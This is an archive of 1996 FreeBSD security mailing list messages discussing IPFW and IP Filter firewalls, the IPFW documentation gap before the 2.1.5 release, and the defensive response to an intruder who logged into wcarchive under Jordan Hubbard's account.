From owner-freebsd-security Sun Jun 23 02:12:28 1996
From: "Andrew V. Stesin"
Message-Id: <199606230924.MAA08929@office.elvisti.kiev.ua>
Subject: Re: IPFW vs. IP Filter?
To: avalon@coombs.anu.edu.au (Darren Reed)
Date: Sun, 23 Jun 1996 12:24:12 +0300 (EET DST)
Cc: stesin@elvisti.kiev.ua, freebsd-security@FreeBSD.org
In-Reply-To: <199606230504.IAA28342@office.elvisti.kiev.ua> from "Darren Reed" at Jun 23, 96 02:51:07 pm

#
# In some mail from Andrew V. Stesin, sie said:
# [...]
# > 1. Sending TCP RST in reply to unsolicited TCP SYN
# > didn't work. That was solved, thanks Darren,
# > but I'm not 100% sure that this patch is included
# > in 3.0.4 distribution.
#
# Just a minor nit, you can send a TCP RST in reply to any TCP packet except
# one containing an RST (feedback loop :-).

Thanks, I know ;) "Unsolicited SYN" I told, meaning an attempt to initiate
a connection. Or you want to say that a combo of SYN and RST might be sent
to do some kind of port scanning?

# > 2. With "in-kernel" version, "log body" doesn't work for
# > me; I discovered the fact too late, when fighting
# > with crashes of our firewall. Disabling all "log body"
# > clauses in filtering rules cured those mysterious crashes,
# > too, firewall is working for weeks just now, as I see.
# > Now when I'm just 90% sure I found the source of trouble,
# > which tortured me for weeks, probably it's time to
# > go check where exactly it lives.
#
# Thanks, I'll have a look too.

You'd probably like to check your old mail -- I sent a bunch of debugger
output regarding this problem some time ago. The crash isn't easily
reproducible, so if you want me to repeat my explorations, please let me
know -- I'll try once again.

# Darren
#

Thanks for the nice tool, Darren! BTW -- will it be a bugfix 3.0.5
version, or you're working on a new release only?
(Now when I got a box at home, and moved to -FreeBSD-current, I'm going to
check IPfilter with -current, so should I go with a new version?)

--
With best regards -- Andrew Stesin.
+380 (44) 2760188    +380 (44) 2713457    +380 (44) 2713560
"You may delegate authority, but not responsibility."
                                    Frank's Management Rule #1.

From owner-freebsd-security Sun Jun 23 05:46:29 1996
Date: Sat, 22 Jun 1996 14:38:52 -0500 (CDT)
Message-Id: <199606221938.OAA12916@zen.nash.org>
From: Alex Nash
To: gpalmer@FreeBSD.ORG
Cc: taob@io.org
Subject: freebsd-security@FreeBSD.org
Reply-to: nash@mcs.com
Resent-To: security@FreeBSD.ORG
Resent-Date: Sun, 23 Jun 1996 13:42:57 +0100
Resent-From: Gary Palmer

> > I'm setting up a FreeBSD-based firewall here, and my original plan
> > was to go with IPFW in the kernel. However, it seems there isn't any
> > recent documentation for it (both the man page and the handbook entry
> > are out of date).
>
> I thought Alex Nash recently updated both? Have you tried our WWW
> pages to get the latest version?

:( Unfortunately not. When I submitted my ipfw changes into -current,
my understanding was that 2.1.5 was about 2 weeks from being solidified.
The dilemma was whether I should risk bringing in mass changes into
-stable. After discussing this with Poul, I decided against doing so.

-stable has all the latest bug fixes, but lacks the updated
documentation. I'm sitting on some handbook changes because I didn't
want the handbook to *seem* up to date, but really only cover -current.

If anyone has suggestions on where we should take -stable, I'd be
happy to hear them. If it looks like 2.1.5 will be delayed long
enough, we can see about bringing -stable up to the level of -current.

Alex

From owner-freebsd-security Sun Jun 23 08:44:34 1996
Date: Sun, 23 Jun 1996 09:44:16 -0600
From: Nate Williams
Message-Id: <199606231544.JAA18001@rocky.sri.MT.net>
To: nash@mcs.com
Cc: freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org
Subject: Re: IPFW documentation
In-Reply-To: <199606221938.OAA12916@zen.nash.org>

Alex Nash writes:
> > > I'm setting up a FreeBSD-based firewall here, and my original plan
> > > was to go with IPFW in the kernel. However, it seems there isn't any
> > > recent documentation for it (both the man page and the handbook entry
> > > are out of date).
> >
> > I thought Alex Nash recently updated both? Have you tried our WWW
> > pages to get the latest version?
>
> :( Unfortunately not. When I submitted my ipfw changes into -current,
> my understanding was that 2.1.5 was about 2 weeks from being solidified.
> The dilemma was whether I should risk bringing in mass changes into
> -stable. After discussing this with Poul, I decided against doing so.

I *sort of* agree. The problem is that both the man pages and the
documentation we have is *wrong* and out of date. There have been
*many* changes made to both the kernel and user-land code, but there
has been *NO* documentation of it.

From /sys/netinet/ip_fw.c
revision 1.14.4.7
date: 1996/05/06 20:32:01;  author: phk;  state: Exp;  lines: +18 -14
Merge from head.

From ipfw.8
revision 1.7.4.6
date: 1996/02/26 15:26:59;  author: phk;  state: Exp;  lines: +194 -29
Update to lates reality.

We've got a problem here.

I consider this a *bug*, and a critical one at that, especially given
our potential customer base. The people most likely to use 2.1.5 are
ISP's and such, who have both a need and a desire for the functionality
of IPFW.

> -stable has all the latest bug fixes, but lacks the updated
> documentation. I'm sitting on some handbook changes because I didn't
> want the handbook to *seem* up to date, but really only cover -current.
What about the man-pages & the stuff in /etc? Are they correct and up
to date? Even if the handbook stuff isn't correct, the on-line stuff
should at least be somewhat correct.

> If anyone has suggestions on where we should take -stable, I'd be
> happy to hear them. If it looks like 2.1.5 will be delayed long
> enough, we can see about bringing -stable up to the level of -current.

We have until Tuesday to get things at least somewhat 'sane'. Please
can you take the time to document what exists in -stable!?!?

Nate

From owner-freebsd-security Sun Jun 23 09:07:39 1996
Date: Sun, 23 Jun 1996 11:05:36 -0500 (CDT)
Message-Id: <199606231605.LAA07941@zen.nash.org>
From: Alex Nash
To: nate@sri.MT.net
Cc: freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org
Subject: Re: IPFW documentation
Reply-to: nash@mcs.com

> > :( Unfortunately not. When I submitted my ipfw changes into -current,
> > my understanding was that 2.1.5 was about 2 weeks from being solidified.
> > The dilemma was whether I should risk bringing in mass changes into
> > -stable. After discussing this with Poul, I decided against doing so.
>
> I *sort of* agree. The problem is that both the man pages and the
> documentation we have is *wrong* and out of date. There have been
> *many* changes made to both the kernel and user-land code, but there
> has been *NO* documentation of it.
>
> From /sys/netinet/ip_fw.c
> revision 1.14.4.7
> date: 1996/05/06 20:32:01;  author: phk;  state: Exp;  lines: +18 -14
> Merge from head.
>
> From ipfw.8
> revision 1.7.4.6
> date: 1996/02/26 15:26:59;  author: phk;  state: Exp;  lines: +194 -29
> Update to lates reality.
>
> We've got a problem here.
>
> I consider this a *bug*, and a critical one at that, especially given
> our potential customer base. The people most likely to use 2.1.5 are
> ISP's and such, who have both a need and a desire for the functionality
> of IPFW.

I agree with your last statement 100% (in fact this came up in my
discussion with Poul). But since I didn't know exactly when -stable
would freeze, I was very concerned that I might introduce a problem
that would end up getting shipped in 2.1.5. In retrospect, I should
have bit the bullet and just done it.

> > -stable has all the latest bug fixes, but lacks the updated
> > documentation. I'm sitting on some handbook changes because I didn't
> > want the handbook to *seem* up to date, but really only cover -current.
>
> What about the man-pages & the stuff in /etc? Are they correct and up
> to date?
> Even if the handbook stuff isn't correct, the on-line stuff
> should at least be somewhat correct.

No argument here :)

> > If anyone has suggestions on where we should take -stable, I'd be
> > happy to hear them. If it looks like 2.1.5 will be delayed long
> > enough, we can see about bringing -stable up to the level of -current.
>
> We have until Tuesday to get things at least somewhat 'sane'. Please
> can you take the time to document what exists in -stable!?!?

You bet. How about this:

- Bring src/sys/netinet/ip_fw.c up to -current level (or very
  close to).

- Bring src/sbin/ipfw/ipfw.c in line with the kernel changes.

- Try and get the man page in shape (the version in -current is
  a lot closer, but not perfect).

(The handbook may have to lag a bit, sorry :( )

When this is done, I'll announce where patches can be found so that as
many people as possible can bang on it to make sure it's ok. That'll
give me the comfort level I'd need to place these changes into 2.1.5.
Does this sound viable?

Alex

From owner-freebsd-security Sun Jun 23 11:27:56 1996
Date: Sun, 23 Jun 1996 12:27:46 -0600
From: Nate Williams
Message-Id: <199606231827.MAA18224@rocky.sri.MT.net>
To: nash@mcs.com
Cc: nate@sri.MT.net, freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org
Subject: Re: IPFW documentation
In-Reply-To: <199606231605.LAA07941@zen.nash.org>

> > We have until Tuesday to get things at least somewhat 'sane'. Please
> > can you take the time to document what exists in -stable!?!?
>
> You bet. How about this:
>
> - Bring src/sys/netinet/ip_fw.c up to -current level (or very
>   close to).
>
> - Bring src/sbin/ipfw/ipfw.c in line with the kernel changes.
>
> - Try and get the man page in shape (the version in -current is
>   a lot closer, but not perfect).

It works for me, but I'm no expert on any of it. However, when I
upgrade my box from 2.1R -> 2.1.5 I will want to know what has changed.
Unfortunately, I can't do that for at least another 2 weeks since I'm
upgrading everything else this week and am taking time off the week
after.

> When this is done, I'll announce where patches can be found so that as
> many people as possible can bang on it to make sure it's ok.

Patches for what? I don't think you'll get enough time to get it
reviewed and in before Tuesday, but if you think it can be done go for
it. In any case, the docs and the source should match by the time 2.1.5
is rolled.

> That'll
> give me the comfort level I'd need to place these changes into 2.1.5.
> Does this sound viable?

As long as everything is in sync, I don't mind. I'd prefer backing
the new stuff out completely if we can't keep the sources and docs in
sync, since the only thing worse than buggy code is code that's
documented incorrectly.
Nate

From owner-freebsd-security Sun Jun 23 12:37:49 1996
Date: Sun, 23 Jun 1996 14:35:46 -0500 (CDT)
Message-Id: <199606231935.OAA00300@zen.nash.org>
From: Alex Nash
To: nate@sri.MT.net
Cc: freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org
Subject: Re: IPFW documentation
Reply-to: nash@mcs.com

> > You bet. How about this:
> >
> > - Bring src/sys/netinet/ip_fw.c up to -current level (or very
> >   close to).
> >
> > - Bring src/sbin/ipfw/ipfw.c in line with the kernel changes.
> >
> > - Try and get the man page in shape (the version in -current is
> >   a lot closer, but not perfect).
>
> It works for me, but I'm no expert on any of it. However, when I
> upgrade my box from 2.1R -> 2.1.5 I will want to know what has changed.
> Unfortunately, I can't do that for at least another 2 weeks since I'm
> upgrading everything else this week and am taking time off the week
> after.

I'm not sure how much I can help with the differences, but I guess I
would summarize the main differences as:

- The default policy is now deny (previously it was allow)

- The syntax of ipfw has changed substantially (see ipfw(8) for details)

> > When this is done, I'll announce where patches can be found so that as
> > many people as possible can bang on it to make sure it's ok.
>
> Patches for what? I don't think you'll get enough time to get it
> reviewed and in before Tuesday, but if you think it can be done go for
> it. In any case, the docs and the source should match by the time 2.1.5
> is rolled.

In between writing the first message and this one I've merged -stable
with -current and am running it at this moment. The main advantages
are:

- Better error messages, usage output, etc.

- Slightly more intuitive (accepts host names, for example)

- New features (yes, this can be viewed as a reason *not* to include
  it in -release, but I haven't heard any complaints about the
  code in -current yet)

- Updated man page (we can use the one in current)

I need to tie up a few loose ends, and then I'll post patches so that
it can be reviewed by all.
> > That'll
> > give me the comfort level I'd need to place these changes into 2.1.5.
> > Does this sound viable?
>
> As long as everything is in sync, I don't mind. I'd prefer backing
> the new stuff out completely if we can't keep the sources and docs in
> sync, since the only thing worse than buggy code is code that's
> documented incorrectly.

I'm not going to touch backing out of the new stuff, that would be
Poul's decision. If the current ipfw implementation stays, I think
it would be worthwhile to try and incorporate the most recent man page
and cosmetic/convenience fixes to ipfw. To make this happen though,
we need reviewers. Any volunteers? :)

Alex

From owner-freebsd-security Sun Jun 23 15:09:41 1996
Date: Sun, 23 Jun 1996 16:09:30 -0600
From: Nate Williams
Message-Id: <199606232209.QAA18682@rocky.sri.MT.net>
To: nash@mcs.com
Cc: nate@sri.MT.net, freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org, phk@FreeBSD.org
Subject: Re: IPFW documentation
In-Reply-To: <199606231935.OAA00300@zen.nash.org>

> In between writing the first message and this one I've merged -stable
> with -current and am running it at this moment. The main advantages
> are:
>
> - Better error messages, usage output, etc.
>
> - Slightly more intuitive (accepts host names, for example)
>
> - New features (yes, this can be viewed as a reason *not* to include
>   it in -release, but I haven't heard any complaints about the
>   code in -current yet)
>
> - Updated man page (we can use the one in current)
>
> I need to tie up a few loose ends, and then I'll post patches so that
> it can be reviewed by all.

I hope we get reviewers, but if you don't I'd still bring it into
-stable since you've given 'fair notice'.

> > As long as everything is in sync, I don't mind. I'd prefer backing
> > the new stuff out completely if we can't keep the sources and docs in
> > sync, since the only thing worse than buggy code is code that's
> > documented incorrectly.
>
> I'm not going to touch backing out of the new stuff, that would be
> Poul's decision. If the current ipfw implementation stays, I think
> it would be worthwhile to try and incorporate the most recent man page
> and cosmetic/convenience fixes to ipfw. To make this happen though,
> we need reviewers. Any volunteers? :)

If the current ipfw implementation stays it *must* have correct
documentation, or else it should be backed out. I prefer the former,
but I have no time to test it.
Nate

From owner-freebsd-security Sun Jun 23 16:01:04 1996
Date: Sun, 23 Jun 1996 18:54:36 -0400 (EDT)
From: Brian Tao
To: "Andrew V. Stesin"
cc: Darren Reed, freebsd-security@FreeBSD.org
Subject: Re: IPFW vs. IP Filter?
In-Reply-To: <199606222305.CAA15185@office.elvisti.kiev.ua>

On Sun, 23 Jun 1996, Andrew V. Stesin wrote:
>
> Building IPfilter. Generally the instructions worked for me;
> I did minor modifications to the makefiles to suit my local
> needs. Then cd FreeBSD; kinstall; cd BSD; make all install
> was the correct sequence, I recall.

    According to INSTALL.xBSD:

>>>>>
To build a kernel for use with the loadable kernel module, follow
these steps:

1. do "make bsd"

2. cd to the "BSD" directory and type "make install"

3. run "4bsd/minstall" as root

4. build a new kernel
[...]
<<<<<

    I can't get past the "make bsd" part:

# make bsd
[...]
gcc -I. -Wall -O -pipe -I.. -DIPFILTER_LKM -DIPFILTER_LOG -D`uname -m` -DINET -DKERNEL -D_KERNEL -I/usr/include -I/sys -I/sys/sys -I/sys/arch -DIPL_NAME=\"/dev/ipl\" -c ../mln_ipl.c -o ml_ipl.o
In file included from /usr/include/sys/conf.h:224,
                 from ../mln_ipl.c:14:
/usr/include/machine/conf.h:6: ioconf.h: No such file or directory
../mln_ipl.c:74: warning: initialization from incompatible pointer type
../mln_ipl.c:76: warning: initialization from incompatible pointer type
../mln_ipl.c:77: warning: initialization from incompatible pointer type
../mln_ipl.c:78: warning: initialization from incompatible pointer type
../mln_ipl.c:79: warning: initialization from incompatible pointer type
../mln_ipl.c:80: warning: initialization from incompatible pointer type
../mln_ipl.c:86: parse error before string constant
../mln_ipl.c:86: parse error before string constant
../mln_ipl.c:86: warning: missing braces around initializer for `IPL_VERSION_module.lkm_dev'
../mln_ipl.c:89: conflicting types for `cdevsw'
/usr/include/sys/conf.h:122: previous declaration of `cdevsw'
../mln_ipl.c: In function `ipl_load':
../mln_ipl.c:175: warning: suggest parentheses around assignment used as truth value
../mln_ipl.c: In function `xxxinit':
../mln_ipl.c:199: `_module' undeclared (first use this function)
../mln_ipl.c:199: (Each undeclared identifier is reported only once
../mln_ipl.c:199: for each function it appears in.)
../mln_ipl.c: At top level:
../mln_ipl.c:86: warning: `IPL_VERSION_module' defined but not used
*** Error code 1

Stop.
*** Error code 1

Stop.

    Do I have to unpack the source somewhere in the kernel source
tree? ioconf.h only exists in the /sys/compile/[...] directories.
--
Brian Tao (BT300, taob@io.org, taob@ican.net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

From owner-freebsd-security Sun Jun 23 16:07:30 1996
Message-Id: <199606232307.QAA00816@freefall.freebsd.org>
From: Darren Reed
Subject: Re: IPFW vs. IP Filter?
To: taob@io.org (Brian Tao)
Date: Mon, 24 Jun 1996 09:04:39 +1000 (EST)
Cc: stesin@elvisti.kiev.ua, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.org
In-Reply-To: from "Brian Tao" at Jun 23, 96 06:54:36 pm

In some mail from Brian Tao, sie said:
>
> On Sun, 23 Jun 1996, Andrew V. Stesin wrote:
> >
> > Building IPfilter. Generally the instructions worked for me;
> > I did minor modifications to the makefiles to suit my local
> > needs. Then cd FreeBSD; kinstall; cd BSD; make all install
> > was the correct sequence, I recall.
>
> According to INSTALL.xBSD:
>
> >>>>>
> To build a kernel for use with the loadable kernel module, follow
> these steps:
>
> 1. do "make bsd"
>
> 2. cd to the "BSD" directory and type "make install"
>
> 3. run "4bsd/minstall" as root
>
> 4. build a new kernel
> [...]
> <<<<<
>
> I can't get past the "make bsd" part:
>
> # make bsd
[...]
> Stop.
> *** Error code 1
>
> Stop.
>
> Do I have to unpack the source somewhere in the kernel source
> tree? ioconf.h only exists in the /sys/compile/[...] directories.

I don't expect it will compile on FreeBSD-current (2.2). They changed a
lot of that part of the kernel and if nobody else does the patches
before I do, I'll do it when I have a 2.2-RELEASE CD-ROM to install
from.

Darren

From owner-freebsd-security Sun Jun 23 17:11:55 1996
From: John Capo
Message-Id: <199606240009.UAA16450@irbs.irbs.com>
Subject: Re: IPFW vs. IP Filter?
To: taob@io.org (Brian Tao)
Date: Sun, 23 Jun 1996 20:09:08 -0400 (EDT)
Cc: stesin@elvisti.kiev.ua, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.ORG
In-Reply-To: from Brian Tao at "Jun 23, 96 06:54:36 pm"

Brian Tao writes:
>
> Do I have to unpack the source somewhere in the kernel source
> tree? ioconf.h only exists in the /sys/compile/[...] directories.

Much work needed to run it on 2.2. I can provide patches for kernel
install if you like.

John Capo
jc@irbs.com                          IRBS Engineering
FreeBSD Servers and Workstations     (954) 792-9551
Unix/Internet Consulting - ISP Solutions

From owner-freebsd-security Sun Jun 23 17:26:01 1996
To: hackers@freebsd.org
cc: security@freebsd.org, ache@freebsd.org
Subject: I need help on this one - please help me track this guy down!
Date: Sun, 23 Jun 1996 17:25:35 -0700
Message-ID: <7979.835575935@time.cdrom.com>
From: "Jordan K. Hubbard"

jkh      p2   a235.pu.ru        Sun04PM     - -bash (bash)

This was "me" on wcarchive.cdrom.com today - when I caught the guy I
starred myself out of the password file and `watch -W'd' him. He
wasn't doing anything special, but when I sent him a "gotcha!" he
attempted to remove my home directory (nothing in it, no loss) and
logged out. That proves this guy to not only be a cracker but a
malicious one at that and, were he to be caught and relieved of his
testicles by the russian mafia, I would be the first to ask for them
in a jar as a memento! :-)

I'm not one to generally get too upset about this kind of thing, but
breaking into our flagship machine as me is going just a bit too far
(as was trying to nuke my files when caught - I'd have forgiven him
but for that, now I want his balls).

A traceroute from wcarchive doesn't show me much, but if anybody can
glean some useful information out of it I'd appreciate it.

Thanks!

 5  Helsinki2.FI.EU.net (134.222.228.45)  555.687 ms  518.720 ms  507.602 ms
 6  StPetersburg.RU.EU.net (134.222.23.2)  549.172 ms  592.407 ms  630.928 ms
 7  spb-2-gw.spb.su (193.124.83.66)  547.190 ms  573.518 ms  569.656 ms
 8  hqlgu-LE.pu.ru (193.124.255.134)  519.318 ms  657.805 ms  651.496 ms
 9  slip-0.pu.ru (193.124.85.1)  840.489 ms  671.729 ms  650.750 ms
10  nat.pu.ru (193.124.85.134)  638.649 ms  653.720 ms  720.170 ms
11  gw.pu.ru (193.124.85.219)  752.144 ms  645.046 ms  641.413 ms
12  localhost (127.0.0.1)  670.113 ms  702.233 ms  695.733 ms
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    Interesting!
Jordan

From owner-freebsd-security Sun Jun 23 18:02:33 1996
Message-Id: <199606240102.SAA01723@rah.star-gate.com>
To: "Jordan K. Hubbard"
cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Sun, 23 Jun 1996 17:25:35 PDT." <7979.835575935@time.cdrom.com>
Date: Sun, 23 Jun 1996 18:02:18 -0700
From: Amancio Hasty

Try to use ssh so that your password and session are encrypted. This
will make further "crack" attempts a bit more difficult.

Amancio

From The Desk Of "Jordan K. Hubbard" :
> jkh      p2   a235.pu.ru        Sun04PM     - -bash (bash)
>
> This was "me" on wcarchive.cdrom.com today - when I caught the guy I
> starred myself out of the password file and `watch -W'd' him. He
> wasn't doing anything special, but when I sent him a "gotcha!" he
> attempted to remove my home directory (nothing in it, no loss) and
> logged out. That proves this guy to not only be a cracker but a
> malicious one at that and, were he to be caught and relieved of his
> testicles by the russian mafia, I would be the first to ask for them
> in a jar as a memento! :-)
>
> I'm not one to generally get too upset about this kind of thing, but
> breaking into our flagship machine as me is going just a bit too far
> (as was trying to nuke my files when caught - I'd have forgiven him
> but for that, now I want his balls).
>
> A traceroute from wcarchive doesn't show me much, but if anybody can
> glean some useful information out of it I'd appreciate it.
>
> Thanks!
>
>  5  Helsinki2.FI.EU.net (134.222.228.45)  555.687 ms  518.720 ms  507.602 ms
>  6  StPetersburg.RU.EU.net (134.222.23.2)  549.172 ms  592.407 ms  630.928 ms
>  7  spb-2-gw.spb.su (193.124.83.66)  547.190 ms  573.518 ms  569.656 ms
>  8  hqlgu-LE.pu.ru (193.124.255.134)  519.318 ms  657.805 ms  651.496 ms
>  9  slip-0.pu.ru (193.124.85.1)  840.489 ms  671.729 ms  650.750 ms
> 10  nat.pu.ru (193.124.85.134)  638.649 ms  653.720 ms  720.170 ms
> 11  gw.pu.ru (193.124.85.219)  752.144 ms  645.046 ms  641.413 ms
> 12  localhost (127.0.0.1)  670.113 ms  702.233 ms  695.733 ms
>     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>     Interesting!
>
> Jordan
>

From owner-freebsd-security Sun Jun 23 18:09:36 1996
Date: Sun, 23 Jun 1996 21:08:46 -0400 (EDT)
From: jaeger
To: "Jordan K. Hubbard"
Cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <7979.835575935@time.cdrom.com>

On Sun, 23 Jun 1996, Jordan K. Hubbard wrote:

> jkh       p2    a235.pu.ru      Sun04PM   -  -bash (bash)
>

Sure gets the heart pounding, doesn't it?

> This was "me" on wcarchive.cdrom.com today - when I caught the guy I
> starred myself out of the password file and `watch -W'd' him. He
> wasn't doing anything special, but when I sent him a "gotcha!" he
> attempted to remove my home directory (nothing in it, no loss) and
> logged out. That proves this guy to not only be a cracker but a
> malicious one at that and, were he to be caught and relieved of his
> testicles by the russian mafia, I would be the first to ask for them
> in a jar as a memento! :-)
>
> I'm not one to generally get too upset about this kind of thing, but
> breaking into our flagship machine as me is going just a bit too far
> (as was trying to nuke my files when caught - I'd have forgiven him
> but for that, now I want his balls).

Very amateurish, that.

Contact the Russians on a secure channel (woo, sounds like a spy novel).
Sweep the machine for suid shells and changed binaries. You might want to
suspend some remote logins until you have this worked out.

The process accounting logs, if you run that, may be illuminating.

Check your history file (.bash_history in this case) and anything else he
may have left around (I'm somewhat unclear on whether your home directory
was actually removed).

Even if you find no altered binaries or other evidence the intruder had
gained root access, I'd still fire up lsof and look for sniffers or
backdoor processes. Use tcp wrappers to deny access from *.ru or all but
selected hosts.
I'd say your chances of tracking this guy down are pretty slim unless the
Russian hosts weren't root compromised or they were running enhanced
logging or network monitors.

Could this intrusion possibly have been a result of using cleartext remote
login sessions?

-jaeger

From owner-freebsd-security Sun Jun 23 18:18:06 1996
From: "Jordan K. Hubbard"
To: Amancio Hasty
Cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Sun, 23 Jun 1996 18:02:18 PDT." <199606240102.SAA01723@rah.star-gate.com>
Date: Sun, 23 Jun 1996 18:17:35 -0700
Message-ID: <8275.835579055@time.cdrom.com>

> Try to use ssh so that your password and session are encrypted. This
> will make further "crack" attempts a bit more difficult.

Yeah, we didn't have ssh installed on this machine up to now. I'm fixing
that right now. :-)

Jordan

From owner-freebsd-security Sun Jun 23 18:32:41 1996
Message-Id: <199606240132.SAA01869@rah.star-gate.com>
To: "Jordan K. Hubbard"
Cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Sun, 23 Jun 1996 18:17:35 PDT." <8275.835579055@time.cdrom.com>
Date: Sun, 23 Jun 1996 18:32:25 -0700
From: Amancio Hasty

Also since "you" were logged in, try to look in the logs for a login
session of a foreign host and I would report the incident to the FBI 8)

From The Desk Of "Jordan K. Hubbard" :
> > Try to use ssh so that your password and session are encrypted. This
> > will make further "crack" attempts a bit more difficult.
>
> Yeah, we didn't have ssh installed on this machine up to now. I'm fixing
> that right now. :-)
>
> Jordan

From owner-freebsd-security Sun Jun 23 18:37:28 1996
To: jaeger
Cc: hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Sun, 23 Jun 1996 21:08:46 EDT."
Date: Sun, 23 Jun 1996 18:37:01 -0700
Message-ID: <8355.835580221@time.cdrom.com>
From: "Jordan K. Hubbard"

> > jkh       p2    a235.pu.ru      Sun04PM   -  -bash (bash)
> >
> Sure gets the heart pounding, doesn't it?

It doesn't give one warm fuzzy feelings, no! :-)

> Contact the Russians on a secure channel (woo, sounds like a spy
> novel). Sweep the machine for suid shells and changed binaries. You might

Well, that's why I cc'd Andrey - he's far more "plugged in" to that whole
community than I am. A break-in to wcarchive affects us all since he could
have easily wiped out or compromised our FreeBSD distributions there
(they're writable by me, naturally). I'm running checks now.

I'm sorry to throw fear, uncertainty and doubt into everyone by noting
this possibility, but it'd be remiss of me if I didn't. I'll do my best
to verify the checksums (and checksum files) we have, rebuilding anything
which looks suspect. David will also do a more complete security audit of
this machine later on tonight.

> want to suspend some remote logins until you have this worked out.

I'd like to, but there are too many people running here now and I don't
want to bring all work to a grinding halt over this. I'll see what I can
do.

> The process accounting logs, if you run that, may be illuminating.

Unfortunately we don't since wcarchive has so many processes running on
it that we'd need an entire 4GB disk just for the logs. :-(

> Check your history file (.bash_history in this case) and anything else he
> may have left around (I'm somewhat unclear on whether your home directory
> was actually removed).

It was and he was smart enough to wipe both the .bash_history file and the
shell history (I checked before jumping on him).

> Even if you find no altered binaries or other evidence the intruder
> had gained root access, I'd still fire up lsof and look for sniffers or
> backdoor processes. Use tcp wrappers to deny access from *.ru or all but
> selected hosts.
I'll do what I can - running monitoring on this machine is problematic
due to the load. There are 1250 ftp users logged in right now (he WOULD
pick the day after a new version of Quake was released) and the list of
open files numbers literally in the thousands. :-(

> I'd say your chances of tracking this guy down are pretty slim
> unless the Russian hosts weren't root compromised or they were running
> enhanced logging or network monitors.

I'm hoping that someone at pu.ru will help us out here. I don't think
that they want the reputation this is going to garner for them.

> Could this intrusion possibly have been a result of using cleartext
> remote login sessions?

I don't think so - I have a pretty secure path to wcarchive (the T1 at
WC goes straight into the same service provider's backbone that
wcarchive is on). Both David and I are somewhat worried by this
compromise.

Jordan

From owner-freebsd-security Sun Jun 23 18:40:55 1996
To: Amancio Hasty
Cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Sun, 23 Jun 1996 18:32:25 PDT." <199606240132.SAA01869@rah.star-gate.com>
Date: Sun, 23 Jun 1996 18:40:25 -0700
Message-ID: <8378.835580425@time.cdrom.com>
From: "Jordan K. Hubbard"

> Also since "you" were logged in, try to look in the logs for a
> login session of a foreign host and I would report the incident to the
> FBI 8)

All we have are the "last" logs, which show:

jkh       ttyp2    a235.pu.ru       Sun Jun 23 16:50 - 17:18  (00:28)
jkh       ttyp3    a235.pu.ru       Sun Jun 23 15:00 - 15:34  (00:33)

If someone at the russian site could help correlate this time (PST) to
the local time at wherever a235.ru.pu came in from, we could at least
narrow down which user(s) it might have been.

Also, I think that calling the FBI on this one is only likely to get
me put on infinite hold when they hear that the perpetrator is in
Russia. :-)

Jordan

From owner-freebsd-security Sun Jun 23 19:01:32 1996
Message-Id: <199606240201.TAA02005@rah.star-gate.com>
To: "Jordan K. Hubbard"
Cc: hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Sun, 23 Jun 1996 18:40:25 PDT." <8378.835580425@time.cdrom.com>
Date: Sun, 23 Jun 1996 19:01:17 -0700
From: Amancio Hasty

I would report it nevertheless and who knows, they may even have
e-mail... Also, I am a bit concerned that he tried to erase your home
directory because he/she probably had something in that directory.

Also if you report it, it may help you in the case that the person was
trying to do something really nasty.

BTW: It could be a woman; in that case it may be difficult to get her
balls 8)

Amancio

From The Desk Of "Jordan K. Hubbard" :
> > Also since "you" were logged in, try to look in the logs for a
> > login session of a foreign host and I would report the incident to the
> > FBI 8)
>
> All we have are the "last" logs, which show:
>
> jkh       ttyp2    a235.pu.ru       Sun Jun 23 16:50 - 17:18  (00:28)
> jkh       ttyp3    a235.pu.ru       Sun Jun 23 15:00 - 15:34  (00:33)
>
> If someone at the russian site could help correlate this time (PST) to
> the local time at wherever a235.ru.pu came in from, we could at least
> narrow down which user(s) it might have been.
>
> Also, I think that calling the FBI on this one is only likely to get
> me put on infinite hold when they hear that the perpetrator is in
> Russia. :-)
>
> Jordan

From owner-freebsd-security Sun Jun 23 19:39:22 1996
Date: Sun, 23 Jun 1996 22:39:07 -0400 (EDT)
From: jaeger
To: "Jordan K. Hubbard"
Cc: Amancio Hasty, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <8378.835580425@time.cdrom.com>

On Sun, 23 Jun 1996, Jordan K. Hubbard wrote:

> All we have are the "last" logs, which show:
>
> jkh       ttyp2    a235.pu.ru       Sun Jun 23 16:50 - 17:18  (00:28)
> jkh       ttyp3    a235.pu.ru       Sun Jun 23 15:00 - 15:34  (00:33)
>
> If someone at the russian site could help correlate this time (PST) to
> the local time at wherever a235.ru.pu came in from, we could at least
> narrow down which user(s) it might have been.
>

This appears to be a Dialup IP connection. If the machine logging the
terminal server (or other dialup access device) wasn't root compromised,
we should see some useful logs. Probably a stolen account.

Because of the presence of the lastlog records and the generally good
